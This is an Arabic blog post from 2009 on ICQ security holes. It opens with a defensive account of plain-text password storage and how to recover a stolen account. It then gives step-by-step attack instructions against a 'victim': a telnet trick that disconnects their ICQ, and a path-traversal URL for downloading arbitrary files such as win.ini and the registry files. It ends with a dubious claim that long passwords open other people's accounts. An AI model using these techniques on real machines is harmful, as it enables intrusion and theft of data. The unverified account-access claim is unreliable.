الأحد، مايو 31، 2009

بعض الثغرات الأمنيه فى برنامج icq و الحلول المقترحه لها

المعلومات التالية يجب عليك معرفتها قبل تسجيلك للأيسكيو واذا كنت مسجل بالفعل فأقرأ هذا الدرس بعنايه. الثغرة الأمنية الاولى كلمة السر لرقم الأيسكيو الخاص بالمستخدم تحفظ دون تشفير في ملف نص من نوع (.Dat) الأصدارات : جميع أصدارات الأيسكيو من 98a والى الأخير وصف الثغرة : عند قيامك بتسجيل رقم أيسكيو خاص بك (UIN or UniversalInternetNumber) فأنك تخير بخيار حفظ كلمة المرور في جهازك وبالطبع اذا كنت تخاف من سرقة رقمك الخاص (بخاصة اذا كان الرقم مميز او قديم) فأنك تقوم بأختيار عدم حفظ كلمة المرور.
البرنامج سيقوم بحفظ كلمة المرور في جهازك رغما عن انفك (مهما كانت الدرجة الأمنية التي وضعتها) ولكن بطريقة أخرى وهي كالتالي : في المجلد الخاص ببرنامج الأيسكيو في جهازك (الأفتراضي هو - c:\Program Files\ICQ) ستجد هناك مجلد فرعي اسمه (NewDB) . عند فتحك لهذا المجلد ستجد عدداً من الملفات المسماة تبعاً لرقمك كالتالي: XXXXXXXX.Dat XXXXXXXX.Tmp وغيرها من الملفات (تقريباً أربع ملفات لكل رقم مسجل بجهازك وبالطبع الرموز XXXXXXXX ترمز الى رقمك الخاص - UIN.
ولكن ما يهمنا هنا هو الملف (XXXXXXXX.dat) . حيث ان هذا الملف سينشأ تلقائيا عند تسجيلك للحساب. وفائدته هو انه يقوم بحفظ معلومات عنك و عن آخر اتصال قمت به (النك نيم - المعلومات الشخصية بالكامل - قائمة الأتصال لديك -آخر رسائل مرسلة ومستقبلة و مواقع - وغيرها).
أيضا ستجد بهذا الملف كلمة السر الخاصة بك على شكل نص واضح . في البداية : ظهرت برنامج يقوم بقراءة المعلومات بالكامل لأي ملف من ان النوع السابق تضعه له (ICQ Info Detector). فبالتالي ليس على المخترق سوى أنزال الملف من جهازك الى جهازه (حجم الملف يتراوح ما بين 50K و 300K، بحسب مدة آخر اتصال لك) وقراءة المعلومات السابقة بالبرنامج المذكور.
بالطبع سيقوم الهاكر بتغيير كلمة السر واذا كان خبير سرقة ارقام فسيقوم بتعديل البريد الالكتروني الاساسي والثانوي ليمنعك من استعادة الرقم عن طريق الموقع ( http://www.icq.com/password ) .
حل المشكلة : ليس هناك حل لهذه المشكلة حيث ان كلمة السر ستضل تحفظ مرة اخرى في كل مرة تقوم بالتسجيل. ولكن هنالك بعض الطرق يمكنك الأستفادة منها في حماية حسابك وهي كالتالي:
1/(الحل المبدئي المبسط) قم بتغيير مجلد الأيسكيو في مجل آخر غير الأفتراضي للتضليل (مع أبقاء المجلد الأفتراضي للتمويه ومسح الملف السابق منه طبعا).اي مثلا تضعه كالتالي: c:\Windows\System\Shell32\Data الطريقة الثانية تعتمد على درجة خبرة المخترق.
حيث أن الأصدار السابق من البرنامج يقوم بعرض الكلمة ولا يسمح بنسخها (Copy) وأنما قراءتها فقط. أيضا البرنامج مصمم بلغة أنجليزية ويعتمد خط (فونت Font) أنجليزي. فأذا قمت بكتابة كلمة السر باللغة العربية فأنها ستظهر له في البرنامج على شكل رموز لن تفيده بشئ.
الطريقة الثانيه لن تنفع مع دخول شخص يشغل مخه لجهازك. لسببين: (الأول انه بأمكانه بكل بساطة تشغيل الملف على النوت باد Notbad أو على الوورد وهنالك ستظهر كلمة السر بالعربي واضحة والثاني هو توفر برنامج جديد يسمح لك بنسخ الرموز والتسجيل بها وهي طريقة تعمل بالفعل).أذن ليس عليك سوى القيام بخطوتين قد تعمل أحداهما: اولاً ابحث عن رقمك وانظر الى المعلومات الشخصية له.
اذا كان بريدك ما زال مسجلا سواء في الرئيسي او الثانوي او حتى القديم فقم بالذهاب الى موقع الأيسكيو وفي القسم الخاص بفاقدي كلمة السر واطلب منهم ارسال كلمة السر الى بريدك وسيتم ارسالها لك خلال فترة لا تزيد عن ساعتين. ثانيا وفي حالة ان البريد تم تعديله او مسحه او حتى انك ما كتبته اساسا فقم بأرسال بريد الى احد او جميع العناوين التالية: (يفضل ان يكون من بريدك الذي كان مسجلاً بالايسكيو) Abuse@Icq.com Support@Icq.com Forgetpadd@Icq.com وقم بتضمين جميع معلوماتك السابقة في الرسالة (النك القديم - كلمة السر - البريد - اللستة الخاصة بك - ملفات History المسجلة - التاريخ الذي تعتقد انه تمت سرقة الرقم به - تاريخ أخر دخول لك للايسكيو برقمك السري الخاص ) . وسيقومون بالرد على موضوعك وغالبا ما سيعود لك رقمك.
الثغرة الثانية: (خطر الدخول الى جهازك عن طريق تسجيلك لصفحة شخصية لدى دومين الأيسكيو): الكل يتسائل (لماذا يوجد بجانب اسم بعض الأشخاص في القائمة علامة منزل صغير؟ ) وهذا بالطبع معناه انهم لديهم صفحة شخصية بدومين الأيسكيو والوب سيرفر حق الأيسكيو يعمل بأجهزتهم حاليا. أي شخص لديه المنزل الصغير بجنب اسمه بأمكانك تعمل له عدة أشياءمثل أنك تقفل عليه برنامج الأيسكيو وانك تنزل من جهازه اي ملف (محدد)تريده انت. ولاحظ القوسين حول محدد: يعني انك لابد أن تحدد الملف الذي تريده وموقعه في جهاز الضحية.
أولا : طريقة أغلاق جهاز الضحيه:
1- اضغط على أبدأ ثم تشغيل Start --> Run 2- أكتب السطر التالي Telnet 123.123.123.123 80 طبعا رقم الآيبي تغيره لرقم الضحيه.
3-اضغط Enter وانتظر لعمل الأتصال المطلوب.
4- أكتب في التلنت Quit وانتظر من 10-20 ثانيه.
اذا رأيت الضحيه فصل اتصاله من الأيسكيو فيعني ان الطريقه نجحت (نجحت = بعض اصدارات الايسكيو الجديده تم تعديل هذه الثغرة فيها واخر اصدار فيه العيب هو build 1700. ثانياً : نزل الملف الذي تريده من جهازه. 1- شغل المتصفح بجهازك 2- في شريط العنوان اكتب السطر التالي: http://123.123.123.123/.html/......../windows/win.ini لاحظ (/.html/) فائدتها انها تخدع السيرفر وتجعله يفكر الملف من نوع Html . ولاحظ الثماني نقاط (/......../) تعني انه يعود 4 مجلدات للأعلى بجهاز المنكوب. ملحوظه: يجب ان يكون الأيسكيو في المجلد الأفتراضي (C:\Windows\Progra~1\Icq) و 95% يكون المجلد هو الافتراضي. 3- اضغط Enter في المتصفح 4- المتصفح سيعطيك رسالة اذا كنت تريد فعلا انزال الملف فاضغط نعم واحفظه بجهازك. وبتنقيص النقاط تطلع مجلد واحد للأعلى. يعني 7 نقاط تعطيك مجلد الايسكيو و 6 تعطيك الروت C-Drive. وبنفس الطريقه السابقه تقدر تنزل اي ملف بجهازه بدون باتش. (أشتراكاته سواء بالمواقع او الشركات - حساب الايسكيو الخاص فيه )
الثغرة الثالثة : أخطر ثغره : وهى عند إدخال كلمة السر يجب أن تحفظها جيدا و إلا إذا وضعت أكثر من ثمانى أرقام سيدخلك إلى حساب شخص آخرو منهتستطيع رؤية رسائله و طبعا و هو غير متصلأستكمال للثغره الثانيه من الموضوع الاساسي الاول: اذا دخلت على جهازه تقدر تعرف نسخة الويندوز بسحب الملف Msdos.sys وتقددر تعرف اشتراكاته وتحول الويندوز لديه إلى نسخه من الويندوزلديك بسحب الريجستري لديه( System.dat User.dat) بمجلد الويندوز .